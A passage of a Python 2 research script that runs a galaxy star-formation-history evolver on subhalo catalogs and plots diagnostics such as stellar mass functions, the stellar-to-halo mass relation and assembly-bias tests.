    m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
    sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
    sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
    # also plot the SHAM SMHMR
    m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
    sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
    sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
    sub.set_xlim([10.5, 14.])
    sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
    sub.set_ylim([8., 12.])
    sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
    # panel 3: Delta log SFR history of one random galaxy per M* bin
    isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
    m_bin = np.arange(9.0, 12.5, 0.5)
    i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
    sub = fig.add_subplot(1,3,3)
    for i in np.unique(i_bin):
        i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
        # offset from the SFMS at the starting snapshot
        dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
            subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap0),
            theta_SFMS=theta['sfms']) + subcat['m.star0'][isSF[i_rand]])[0]]
        sub.text(UT.t_nsnap(nsnap0 - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
        for nn in range(2, nsnap0)[::-1]:
            M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
            mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=theta['sfms']) + M_nn
            dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
        mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
            UT.z_nsnap(1), theta_SFMS=theta['sfms']) + subcat['m.star'][isSF[i_rand]]
        dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
        sub.plot(UT.t_nsnap(range(1,nsnap0+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
    # +/- 0.3 dex band around the SFMS for reference
    sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
    sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
    sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
    sub.set_xlabel('$t_{cosmic}$', fontsize=25)
    sub.set_ylim([-1., 1.])
    sub.set_ylabel('$\Delta$log SFR', fontsize=25)
    fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
    if savefig is not None:
        # BUGFIX: this branch previously referenced the undefined name `sfh`
        # (copied from EvolverPlots), raising a NameError whenever savefig
        # was provided. Use the caller-supplied file name instead.
        fig.savefig(''.join([UT.fig_dir(), savefig]), bbox_inches='tight')
        plt.close()
        return None
    else:
        return fig
def EvolverPlots(sfh, nsnap0=None):
    ''' Run the Evolver for SFH scheme `sfh` on the pure-central subhalo
    catalog and save the standard 3-panel QA figure (SMF vs SHAM, SMHMR
    with sigma_logM* annotation, Delta log SFR histories) to
    UT.fig_dir() as `sfh`_eval.png.
    '''
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read()
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta(sfh)
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    eev.Evolve()
    subcat = eev.SH_catalog
    #prettyplot()
    pretty_colors = prettycolors()
    isSF = np.where(subcat['gclass'] == 'star-forming')[0]
    fig = plt.figure(figsize=(25,7))
    # panel 1: SMF evolution of the SF population vs SHAM
    sub = fig.add_subplot(1,3,1)
    for n in range(2, nsnap0+1)[::-1]:
        # identify SF population at snapshot
        smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
            weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
    smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
    sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
    smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
    sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
    sub.set_xlim([6.75, 12.])
    sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
    sub.set_ylim([1e-5, 10**-1.75])
    sub.set_yscale('log')
    sub.set_ylabel('log $\Phi$', fontsize=25)
    sub.legend(loc='upper right')
    # panel 2: stellar-to-halo mass relation
    sub = fig.add_subplot(1,3,2)
    smhmr = Obvs.Smhmr()
    m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
    sig_mstar_mh12 = smhmr.sigma_logMstar(subcat['halo.m'][isSF], subcat['m.star'][isSF], Mhalo=12.)
    sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
    sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
    sub.text(0.3, 0.9, '$\sigma_{log\, M*}(M_h = 10^{12} M_\odot)$ ='+str(round(sig_mstar_mh12, 3)),
        ha='center', va='center', transform=sub.transAxes)
    sub.set_xlim([10.5, 14.])
    sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
    sub.set_ylim([8., 12.])
    sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
    # panel 3: Delta log SFR history of one random galaxy per M* bin
    isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
    m_bin = np.arange(9.0, 12.5, 0.5)
    i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
    sub = fig.add_subplot(1,3,3)
    for i in np.unique(i_bin):
        i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
        # offset from the SFMS at the starting snapshot
        dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
            subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap0),
            theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
        sub.text(UT.t_nsnap(nsnap0 - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
        for nn in range(2, nsnap0)[::-1]:
            M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
            mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
            dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
        mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
            UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
        dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
        sub.plot(UT.t_nsnap(range(1,nsnap0+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
    # +/- 0.3 dex band around the SFMS for reference
    sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
    sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
    sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
    sub.set_xlabel('$t_{cosmic}$', fontsize=25)
    sub.set_ylim([-1., 1.])
    sub.set_ylabel('$\Delta$log SFR', fontsize=25)
    fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
    fig.savefig(''.join([UT.fig_dir(), sfh+'_eval.png']), bbox_inches='tight')
    plt.close()
    return None
def test_Evolver_AssemblyBias(sig_corr, nsnap0=None, downsampled=None):
    ''' Test assembly bias is implementation

    Evolves the catalog with the 'random_step_abias' SFH scheme at
    correlation strength sig_corr, then shows (interactively) the SMHMR,
    the scatter sigma vs halo mass, and dMstar vs dMhalo between
    consecutive snapshots for 5000 random SF galaxies.
    '''
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta('random_step_abias')
    theta['sfh']['sigma_corr'] = sig_corr
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    eev.Evolve()
    subcat = eev.SH_catalog
    prettyplot()
    pretty_colors = prettycolors()
    isSF = np.where(subcat['gclass'] == 'star-forming')[0]
    fig = plt.figure(figsize=(25,7))
    # panel 1: SMHMR, integrated vs SHAM
    sub = fig.add_subplot(1,3,1)
    smhmr = Obvs.Smhmr()
    m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
    sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
    sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
    # also plot the SHAM SMHMR
    m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
    sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
    sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
    sub.set_xlim([10.5, 14.])
    sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
    sub.set_ylim([8., 12.])
    sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
    # panel 2: SMHMR scatter comparison
    sub = fig.add_subplot(1,3,2)
    sub.plot(m_mid, sig_mstar, label='$\sigma_{M_*}$')
    sub.plot(m_mid, sig_msham, label='$\sigma_{M_{sham}}$')
    sub.set_xlim([10.5, 14.])
    sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
    sub.set_ylim([0., 0.5])
    sub.set_ylabel('$\sigma$', fontsize=25)
    sub.legend(loc='upper right')
    # panel 3: dMstar vs dMhalo between consecutive snapshots
    sub = fig.add_subplot(1,3,3)
    isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
    i_rand = np.random.choice(isSF, size=5000, replace=False)#[0]
    for n in range(1, nsnap0)[::-1]:
        # snapshot 1 columns are unprefixed; earlier snapshots carry a prefix
        if n == 1:
            Mstar_n = subcat['m.star'][i_rand]
            Mhalo_n = subcat['halo.m'][i_rand]
            SFR_n = subcat['sfr'][i_rand]
        else:
            Mstar_n = subcat['snapshot'+str(n)+'_m.star'][i_rand]
            Mhalo_n = subcat['snapshot'+str(n)+'_halo.m'][i_rand]
            SFR_n = subcat['snapshot'+str(n)+'_sfr'][i_rand]
        Mstar_n_1 = subcat['snapshot'+str(n+1)+'_m.star'][i_rand]
        Mhalo_n_1 = subcat['snapshot'+str(n+1)+'_halo.m'][i_rand]
        mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(n), theta_SFMS=eev.theta_sfms) + Mstar_n
        dsfrs = SFR_n - mu_sfr
        #mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
        #for nn in range(2, nsnap0)[::-1]:
        #    #M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
        #    mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
        #    dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
        #dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
        #    subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(20),
        #    theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
        dMstar = Mstar_n - Mstar_n_1
        dMhalo = Mhalo_n - Mhalo_n_1
        sub.scatter(dMhalo, dMstar, lw=0)
        #sub.scatter(dMhalo, 0.3 * np.random.randn(len(dMhalo)), c='k')
        #print np.std(dsfrs)
        #sub.scatter(dMhalo, dsfrs, lw=0)
    sub.set_xlim([-0.5, 0.5])
    sub.set_xlabel('$\Delta$ log $M_{halo}$', fontsize=25)
    #sub.set_ylabel('$\Delta$ log $M_*$', fontsize=25)
    sub.set_ylim([-1., 1.])
    sub.set_ylabel('$\Delta$ log SFR', fontsize=25)
    fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
    plt.show()
    return None
def test_AssemblyBias(sig_corr, nsnap0=None, downsampled=None):
    ''' Test how assembly bias is implemented by comparing the distribution of (D SFR, D Mhalo)
    for SF galaxies.
    ################################################
    test seems successful
    ################################################

    For each pair of consecutive snapshots a scatter plot of
    (dMhalo, dlogSFR) for 5000 random SF galaxies is shown interactively,
    overplotted on an uncorrelated Gaussian reference (black).
    '''
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta('random_step_abias')
    theta['sfh']['sigma_corr'] = sig_corr # with specified correlation (assembly bias)
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    eev.Evolve()
    subcat = eev.SH_catalog
    #prettyplot()
    pretty_colors = prettycolors()
    # pick 5000 star forming galaxies with halos since nsnap0
    isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0) & (subcat['weights'] > 0.))[0]
    i_rand = np.random.choice(isSF, size=5000, replace=False)#[0]
    for n in range(1, nsnap0)[::-1]:
        fig = plt.figure(figsize=(7,7))
        sub = fig.add_subplot(1,1,1)
        # snapshot 1 columns are unprefixed; earlier snapshots carry a prefix
        if n == 1:
            Mstar_n = subcat['m.star'][i_rand]
            Mhalo_n = subcat['halo.m'][i_rand]
            SFR_n = subcat['sfr'][i_rand]
        else:
            Mstar_n = subcat['snapshot'+str(n)+'_m.star'][i_rand]
            Mhalo_n = subcat['snapshot'+str(n)+'_halo.m'][i_rand]
            SFR_n = subcat['snapshot'+str(n)+'_sfr'][i_rand]
        Mstar_n_1 = subcat['snapshot'+str(n+1)+'_m.star'][i_rand]
        Mhalo_n_1 = subcat['snapshot'+str(n+1)+'_halo.m'][i_rand]
        # delta SFR
        mu_sfr = Obvs.SSFR_SFMS(Mstar_n, UT.z_nsnap(n), theta_SFMS=eev.theta_sfms) + Mstar_n
        dsfrs = SFR_n - mu_sfr
        dMstar = Mstar_n - Mstar_n_1
        dMhalo = Mhalo_n - Mhalo_n_1
        #sub.scatter(dMhalo, dMstar, lw=0)
        # uncorrelated Gaussian reference in black, actual dSFR on top
        sub.scatter(dMhalo, 0.3 * np.random.randn(len(dMhalo)), c='k')
        #print np.std(dsfrs)
        sub.scatter(dMhalo, dsfrs, lw=0)
        sub.set_xlim([-0.5, 0.5])
        sub.set_xlabel('$\Delta$ log $M_{halo}$', fontsize=25)
        #sub.set_ylabel('$\Delta$ log $M_*$', fontsize=25)
        #sub.set_ylim([-1., 1.])
        sub.set_ylabel('$\Delta$ log SFR', fontsize=25)
        plt.show()
        plt.close()
    #fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
    #plt.show()
    return None
def test_EvolverInitiate(test, nsnap, nsnap0=20, downsampled=None):
    ''' Tests for Initiate method in Evolver for specified nsnap snapshot.

    Parameters
    ----------
    test : str
        which diagnostic to show: 'pssfr' (P(SSFR) in mass bins), 'fq'
        (quiescent fraction vs the cosmos_tinker model), 'smf_evol'
        (SMF evolution of the SF population), or 'smf_M0' (SMF fraction
        of galaxies with M_sham(z0) = 0)
    nsnap : int
        snapshot to inspect; must be <= nsnap0
    nsnap0 : int
        ancestor snapshot of the catalog
    downsampled : optional
        downsampling flag forwarded to subhist.Read

    All plots are shown interactively (plt.show).
    '''
    if nsnap > nsnap0:
        raise ValueError('nsnap has to be less than or equal to nsnap0')
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    theta = Evol.defaultTheta('constant_offset') # load in generic theta (parameters)
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    if test == 'pssfr': # calculate P(SSFR)
        obv_ssfr = Obvs.Ssfr()
        started = np.where(subcat['nsnap_start'] == nsnap)
        ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(
            subcat['m.star0'][started],
            subcat['sfr0'][started]-subcat['m.star0'][started],
            weights=subcat['weights'][started])
        fig = plt.figure(figsize=(20, 5))
        bkgd = fig.add_subplot(111, frameon=False)
        panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
        for i_m, mass_bin in enumerate(panel_mass_bins):
            sub = fig.add_subplot(1, 4, i_m+1)
            sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
                lw=3, ls='-', c='k')
            # mark the SSFR of SFMS and Quiescent peak
            # NOTE(review): z is hard-coded to UT.z_nsnap(20) rather than
            # UT.z_nsnap(nsnap) here — confirm whether intentional
            sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(20), theta_SFMS=theta['sfms']), 0., 1.7,
                color='b', linewidth=3)
            sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
                color='r', linewidth=3)
            massbin_str = ''.join([
                r'$\mathtt{log \; M_{*} = [',
                str(mass_bin[0]), ',\;',
                str(mass_bin[1]), ']}$'
                ])
            sub.text(-12., 1.4, massbin_str, fontsize=20)
            # x-axis
            sub.set_xlim([-13., -8.])
            # y-axis
            sub.set_ylim([0.0, 1.7])
            sub.set_yticks([0.0, 0.5, 1.0, 1.5])
            if i_m == 0:
                sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
            else:
                sub.set_yticklabels([])
            ax = plt.gca()
            leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
                bbox_transform=ax.transData, handletextpad=0.5)
        bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
        bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
        plt.show()
    elif test == 'fq': # calculate quiescent fraction
        obv_fq = Obvs.Fq()
        pretty_colors = prettycolors()
        fig = plt.figure(figsize=(6,6))
        sub = fig.add_subplot(111)
        started = np.where(subcat['nsnap_start'] == nsnap)
        print len(started[0]), ' galaxies'
        print np.sum(subcat['weights'][started])
        m_mid, fq, counts = obv_fq.Calculate(
            mass=subcat['m.star0'][started],
            sfr=subcat['sfr0'][started],
            z=UT.z_nsnap(nsnap), weights= subcat['weights'][started], theta_SFMS=theta['sfms'], counts=True)
        cc = pretty_colors[nsnap]
        sub.scatter(m_mid, fq, c=cc, s=10)
        sub.plot(m_mid, fq, c=cc)
        # overplot the literature fq model for comparison
        sub.plot(m_mid, obv_fq.model(m_mid, UT.z_nsnap(nsnap), lit='cosmos_tinker'), c=cc, ls='--')
        # annotate each point with its galaxy count
        for i in range(len(m_mid)):
            sub.text(m_mid[i], 0.05+fq[i], str(counts[i]))
        plt.show()
    elif test == 'smf_evol': # check the SMF evolution of the SF population
        fig = plt.figure(figsize=(7,7))
        sub = fig.add_subplot(111)
        for n in range(2, 21)[::-1]:
            # identify SF population at snapshot
            pop_sf = np.where(
                (subcat['gclass0'] == 'star-forming') &
                (subcat['nsnap_quench'] <= n) &
                (subcat['weights'] > 0.)
                )
            smf_sf = Obvs.getMF(
                subcat['snapshot'+str(n)+'_m.sham'][pop_sf],
                weights=subcat['weights'][pop_sf])
            sub.plot(smf_sf[0], smf_sf[1], lw=2, c='k', alpha=0.05 * (21. - n))#, label='Snapshot '+str(n))
        pop_sf = np.where(
            (subcat['gclass'] == 'star-forming') &
            (subcat['weights'] > 0.)
            )
        smf_sf = Obvs.getMF(
            subcat['m.sham'][pop_sf],
            weights=subcat['weights'][pop_sf])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='--', label='Snapshot 1')
        sub.set_xlim([6., 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylim([1e-5, 10**-1.5])
        sub.set_yscale('log')
        sub.set_ylabel('$\Phi$', fontsize=25)
        sub.legend(loc='upper right')
        plt.show()
    elif test == 'smf_M0': # check the SMF of galaxies with M_sham(z0) = 0
        fig = plt.figure(figsize=(7,7))
        sub = fig.add_subplot(111)
        blank = np.where((subcat['snapshot20_m.sham'] == 0.) & (subcat['weights'] > 0.))
        smf_blank = Obvs.getMF(subcat['m.sham'][blank], weights=subcat['weights'][blank])
        smf_tot = Obvs.getMF(subcat['m.sham'], weights=subcat['weights'])
        # fraction of the total SMF contributed by M_sham(z0) = 0 galaxies
        sub.plot(smf_tot[0], smf_blank[1]/smf_tot[1], lw=3, c='k', ls='-')
        sub.set_xlim([6., 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        #sub.set_ylim([1e-5, 10**-1.5])
        #sub.set_yscale('log')
        #sub.set_ylabel('$\Phi$', fontsize=25)
        plt.show()
    return None
def test_EvolverInitSF(nsnap, nsnap0=20, downsampled=None):
    ''' Checks whether or not the SF populations from Evolver.InitSF
    method correctly produces SFRs on the SFMS.

    Plots P(SSFR) in four stellar-mass bins for the galaxies that started
    at snapshot `nsnap`, with the SFMS (blue) and quiescent-peak (red)
    SSFRs marked for visual comparison. Shown interactively.

    NOTE: uses Cat.PureCentralSubhalos (not PureCentralHistory as the
    other tests here do).
    '''
    if nsnap > nsnap0:
        raise ValueError('nsnap has to be less than or equal to nsnap0')
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralSubhalos(nsnap0=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    theta = Evol.defaultTheta('constant_offset') # load in generic theta (parameters)
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.InitSF()
    obv_ssfr = Obvs.Ssfr()
    started = np.where(subcat['nsnap_start'] == nsnap)
    ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(
        subcat['m.star0'][started],
        subcat['sfr0'][started]-subcat['m.star0'][started],
        weights=subcat['weights'][started])
    fig = plt.figure(figsize=(20, 5))
    bkgd = fig.add_subplot(111, frameon=False)
    panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
    for i_m, mass_bin in enumerate(panel_mass_bins):
        sub = fig.add_subplot(1, 4, i_m+1)
        sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
            lw=3, ls='-', c='k')
        # mark the SSFR of SFMS and Quiescent peak
        sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(nsnap), theta_SFMS=theta['sfms']), 0., 1.7,
            color='b', linewidth=3)
        sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
            color='r', linewidth=3)
        massbin_str = ''.join([
            r'$\mathtt{log \; M_{*} = [',
            str(mass_bin[0]), ',\;',
            str(mass_bin[1]), ']}$'
            ])
        sub.text(-12., 1.4, massbin_str, fontsize=20)
        # x-axis
        sub.set_xlim([-13., -8.])
        # y-axis
        sub.set_ylim([0.0, 1.7])
        sub.set_yticks([0.0, 0.5, 1.0, 1.5])
        if i_m == 0:
            sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
        else:
            sub.set_yticklabels([])
        ax = plt.gca()
        leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
            bbox_transform=ax.transData, handletextpad=0.5)
    bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
    bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
    plt.show()
    return None
def test_EvolverEvolve(test, nsnap0=20, downsampled=None):
    ''' Tests for Evolve method in Evolver

    Runs the full Initiate + Evolve pipeline on a pure-central subhalo
    catalog and then produces one diagnostic plot selected by `test`:

    - 'smf'        : stellar mass functions snapshot by snapshot
    - 'smf_comp'   : SMF decomposed into initial-stellar-mass bins
    - 'pssfr'      : P(log SSFR) in four stellar-mass panels
    - 'smhmr'      : stellar mass to halo mass relation
    - 'sfms'       : SFR vs M* scatter against the SFMS locus
    - 'delMstar'   : integrated M* minus SHAM M*
    - 'delMgrowth' : mass growth since the initial snapshot
    - 'sfh_sfms', 'sfh' : star-formation histories of random galaxies

    NOTE(review): several branches hard-code snapshot ranges/counts for
    nsnap0 = 20 (e.g. range(2, 21), alpha = 0.05 * (21. - n),
    nsnap_start == 20) even though nsnap0 is a parameter — confirm before
    calling with a different nsnap0.
    '''
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta()
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    eev.Evolve()
    subcat = eev.SH_catalog
    pretty_colors = prettycolors()
    if test == 'smf':
        isSF = np.where(subcat['gclass'] == 'star-forming')
        fig = plt.figure(figsize=(7,7))
        sub = fig.add_subplot(111)
        for n in range(2, 21)[::-1]:
            # identify SF population at snapshot
            smf_sf = Obvs.getMF(
                subcat['snapshot'+str(n)+'_m.star'][isSF],
                weights=subcat['weights'][isSF])
            # fade earlier snapshots (small alpha) toward the latest one
            sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
        smf_sf_msham0 = Obvs.getMF(subcat['m.star0'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf_msham0[0], smf_sf_msham0[1], lw=3, c='k', ls='--')
        smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
        # debugging output: count of negative integrated masses and range
        print np.sum(subcat['m.star'][isSF] < 0.)
        print subcat['m.star'][isSF].min(), subcat['m.star'][isSF].max()
        #raise ValueError
        smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
        sub.set_xlim([6., 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylim([1e-6, 10**-1.75])
        sub.set_yscale('log')
        sub.set_ylabel('$\Phi$', fontsize=25)
        sub.legend(loc='upper right')
        plt.show()
    elif test == 'smf_comp':  # SMF of composition
        isSF = np.where(subcat['gclass'] == 'star-forming')[0]
        fig = plt.figure(figsize=(15,7))
        # left panel: integrated M* SMF stacked by initial-mass bin
        sub = fig.add_subplot(121)
        #smf_sf_msham0 = Obvs.getMF(subcat['m.star0'][isSF], weights=subcat['weights'][isSF])
        #sub.plot(smf_sf_msham0[0], smf_sf_msham0[1], lw=3, c='k', ls='--')
        m0s = subcat['m.star0'][isSF]
        mlow = np.arange(m0s.min(), m0s.max(), 0.5)  # 0.5-dex initial-mass bins
        for i_m in range(len(mlow)):
            inMbin = np.where((subcat['m.star0'][isSF] > mlow[i_m]) & (subcat['m.star0'][isSF] < mlow[i_m] + 0.5))
            smf_sf = Obvs.getMF(subcat['m.star'][isSF[inMbin]], weights=subcat['weights'][isSF[inMbin]])
            # smf_sf0/smf_sf1 track the running lower/upper edges of the stack
            if i_m == 0:
                smf_sf0 = np.zeros(len(smf_sf[0]))
                smf_sf1 = smf_sf[1]
            else:
                smf_sf1 = smf_sf0 + smf_sf[1]
            mbin_label = ''.join([str(mlow[i_m])+', '+str(mlow[i_m] + 0.5)])
            sub.fill_between(smf_sf[0], smf_sf0, smf_sf1,
                             facecolor=pretty_colors[i_m % 20], edgecolor=None, lw=0)#, label=mbin_label)
            smf_sf0 = smf_sf1
        # total SMF on top of the stack
        smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='-')
        sub.set_xlim([6., 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylim([1e-6, 10**-1.75])
        sub.set_yscale('log')
        sub.set_ylabel('$\Phi$', fontsize=25)
        #sub.legend(loc='upper right')
        # right panel: same stacking but for SHAM masses
        sub = fig.add_subplot(122)
        m0s = subcat['m.star0'][isSF]
        mlow = np.arange(m0s.min(), m0s.max(), 0.5)
        for i_m in range(len(mlow)):
            inMbin = np.where((subcat['m.star0'][isSF] > mlow[i_m]) & (subcat['m.star0'][isSF] < mlow[i_m] + 0.5))
            smf_sf = Obvs.getMF(subcat['m.sham'][isSF[inMbin]], weights=subcat['weights'][isSF[inMbin]])
